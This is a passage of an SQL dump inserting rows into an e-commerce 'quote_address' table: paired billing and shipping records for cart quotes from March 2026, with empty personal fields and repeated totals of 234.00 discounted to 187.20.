(885, 625, '2026-03-25 20:54:32', '2026-03-25 20:54:32', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(886, 626, '2026-03-25 22:25:35', '2026-03-25 22:25:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(887, 626, '2026-03-25 22:25:36', '2026-03-25 22:25:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(888, 627, '2026-03-26 00:59:19', '2026-03-26 00:59:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(889, 627, '2026-03-26 00:59:19', '2026-03-26 00:59:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(890, 628, '2026-03-26 03:12:31', '2026-03-26 03:12:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(891, 628, '2026-03-26 03:12:31', '2026-03-26 03:12:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(892, 629, '2026-03-26 04:11:33', '2026-03-26 04:11:33', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(893, 629, '2026-03-26 04:11:33', '2026-03-26 04:11:33', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(894, 630, '2026-03-26 07:20:40', '2026-03-26 07:20:40', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(895, 630, '2026-03-26 07:20:40', '2026-03-26 07:20:40', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(896, 631, '2026-03-26 11:06:31', '2026-03-26 11:06:31', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(897, 631, '2026-03-26 11:06:31', '2026-03-26 11:06:31', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(898, 632, '2026-03-26 11:08:21', '2026-03-26 11:08:21', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(899, 632, '2026-03-26 11:08:21', '2026-03-26 11:08:21', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(900, 633, '2026-03-26 15:38:25', '2026-03-26 15:38:25', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(901, 633, '2026-03-26 15:38:25', '2026-03-26 15:38:25', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(902, 634, '2026-03-26 16:04:00', '2026-03-26 16:04:00', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(903, 634, '2026-03-26 16:04:00', '2026-03-26 16:04:00', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(904, 635, '2026-03-26 19:07:14', '2026-03-26 19:07:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(905, 635, '2026-03-26 19:07:14', '2026-03-26 19:07:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(906, 636, '2026-03-26 19:49:52', '2026-03-26 19:49:52', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(907, 636, '2026-03-26 19:49:52', '2026-03-26 19:49:52', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(908, 637, '2026-03-26 20:27:35', '2026-03-26 20:27:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(909, 637, '2026-03-26 20:27:35', '2026-03-26 20:27:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(910, 638, '2026-03-27 00:23:35', '2026-03-27 00:23:35', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0);
INSERT INTO `quote_address` (`address_id`, `quote_id`, `created_at`, `updated_at`, `customer_id`, `save_in_address_book`, `customer_address_id`, `address_type`, `email`, `prefix`, `firstname`, `middlename`, `lastname`, `suffix`, `company`, `street`, `city`, `region`, `region_id`, `postcode`, `country_id`, `telephone`, `fax`, `same_as_billing`, `collect_shipping_rates`, `shipping_method`, `shipping_description`, `weight`, `subtotal`, `base_subtotal`, `subtotal_with_discount`, `base_subtotal_with_discount`, `tax_amount`, `base_tax_amount`, `shipping_amount`, `base_shipping_amount`, `shipping_tax_amount`, `base_shipping_tax_amount`, `discount_amount`, `base_discount_amount`, `grand_total`, `base_grand_total`, `customer_notes`, `applied_taxes`, `discount_description`, `shipping_discount_amount`, `base_shipping_discount_amount`, `subtotal_incl_tax`, `base_subtotal_total_incl_tax`, `discount_tax_compensation_amount`, `base_discount_tax_compensation_amount`, `shipping_discount_tax_compensation_amount`, `base_shipping_discount_tax_compensation_amnt`, `shipping_incl_tax`, `base_shipping_incl_tax`, `vat_id`, `vat_is_valid`, `vat_request_id`, `vat_request_date`, `vat_request_success`, `validated_country_code`, `validated_vat_number`, `gift_message_id`, `free_shipping`) VALUES
(911, 638, '2026-03-27 00:23:35', '2026-03-27 00:23:35', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(912, 639, '2026-03-27 02:41:22', '2026-03-27 02:41:22', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(913, 639, '2026-03-27 02:41:22', '2026-03-27 02:41:22', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(914, 640, '2026-03-27 05:13:19', '2026-03-27 05:13:19', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(915, 640, '2026-03-27 05:13:19', '2026-03-27 05:13:19', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(916, 641, '2026-03-27 08:00:07', '2026-03-27 08:00:07', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(917, 641, '2026-03-27 08:00:07', '2026-03-27 08:00:07', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(918, 642, '2026-03-27 08:00:17', '2026-03-27 08:00:17', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(919, 642, '2026-03-27 08:00:17', '2026-03-27 08:00:17', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(920, 643, '2026-03-27 08:00:44', '2026-03-27 08:00:44', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(921, 643, '2026-03-27 08:00:44', '2026-03-27 08:00:44', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(922, 644, '2026-03-27 08:01:10', '2026-03-27 08:01:10', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(923, 644, '2026-03-27 08:01:10', '2026-03-27 08:01:10', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(924, 645, '2026-03-27 08:01:36', '2026-03-27 08:01:36', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(925, 645, '2026-03-27 08:01:36', '2026-03-27 08:01:36', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(926, 646, '2026-03-27 10:04:14', '2026-03-27 10:04:14', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(927, 646, '2026-03-27 10:04:14', '2026-03-27 10:04:14', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 0, NULL, NULL, 1.0000, 234.0000, 234.0000, 187.2000, 187.2000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, -46.8000, -46.8000, 187.2000, 187.2000, NULL, '[]', NULL, 0.0000, 0.0000, 234.0000, 234.0000, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1),
(928, 647, '2026-03-27 10:22:43', '2026-03-27 10:22:43', NULL, 0, NULL, 'billing', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0, 0, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
(929, 647, '2026-03-27 10:22:43', '2026-03-27 10:22:43', NULL, 0, NULL, 'shipping', NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 1, 1, NULL, NULL, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, 0.0000, NULL, 'null', NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, 0.0000, NULL, 0.0000, 0.0000, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, 0),
